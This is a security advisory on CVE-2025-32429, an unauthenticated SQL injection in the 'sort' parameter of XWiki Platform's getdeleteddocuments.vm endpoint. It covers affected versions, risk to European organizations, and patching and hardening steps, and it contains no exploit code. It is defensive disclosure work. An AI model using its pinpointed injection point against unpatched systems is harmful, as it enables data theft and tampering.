CVE-2025-32429 is a critical SQL Injection vulnerability (CWE-89) affecting the XWiki Platform, a widely used generic wiki platform that provides runtime services for applications built on top of it. The vulnerability exists in versions 9.4-rc-1 through 16.10.5 and 17.0.0-rc-1 through 17.2.2. Specifically, the issue arises from improper neutralization of special elements in the 'sort' parameter of the getdeleteddocuments.vm endpoint. This parameter is directly injected into an SQL ORDER BY clause without proper sanitization or validation, allowing an unauthenticated attacker to craft malicious input that can alter the SQL query logic. Because the injection point is in the ORDER BY clause, the attacker can manipulate the sorting behavior or potentially extract or modify data by leveraging SQL syntax. The vulnerability requires no authentication or user interaction, making it remotely exploitable over the network. The CVSS 4.0 base score is 9.3 (critical), reflecting the high impact on confidentiality, integrity, and availability, as well as the ease of exploitation. The vulnerability was fixed in versions 16.10.6 and 17.3.0-rc-1. No known exploits are currently reported in the wild, but the severity and ease of exploitation make it a significant risk for affected deployments. Organizations using vulnerable versions of XWiki Platform should prioritize patching to mitigate this threat.

For European organizations, this vulnerability poses a substantial risk, especially those relying on XWiki Platform for internal knowledge management, documentation, or collaborative applications. Exploitation could lead to unauthorized data access, data manipulation, or disruption of wiki services, potentially exposing sensitive corporate information or intellectual property. Given that the vulnerability requires no authentication, attackers can remotely exploit it without prior access, increasing the risk of widespread attacks. The impact extends to confidentiality breaches, integrity violations through unauthorized data changes, and availability issues if the database or application becomes unstable due to malicious queries. Organizations in sectors such as finance, government, healthcare, and critical infrastructure, which often use wiki platforms for documentation and collaboration, could face regulatory and reputational damage if exploited. Additionally, the vulnerability could be leveraged as a foothold for further network compromise or lateral movement within enterprise environments.

1. Immediate upgrade to XWiki Platform versions 16.10.6 or later (including 17.3.0-rc-1 and beyond) to apply the official patch that addresses this SQL Injection vulnerability. 2. If immediate patching is not feasible, implement web application firewall (WAF) rules to detect and block suspicious input patterns targeting the 'sort' parameter, especially those containing SQL keywords or special characters used in ORDER BY clauses. 3. Conduct a thorough audit of all XWiki instances to identify vulnerable versions and isolate or restrict access to affected systems until patched. 4. Review and harden database permissions to limit the impact of potential SQL injection, ensuring the database user used by XWiki has the minimum necessary privileges. 5. Monitor application logs and network traffic for unusual queries or access patterns indicative of exploitation attempts. 6. Educate development and operations teams about secure coding practices, emphasizing input validation and parameterized queries to prevent similar vulnerabilities in custom extensions or integrations. 7. Consider deploying runtime application self-protection (RASP) solutions that can detect and block SQL injection attempts in real time.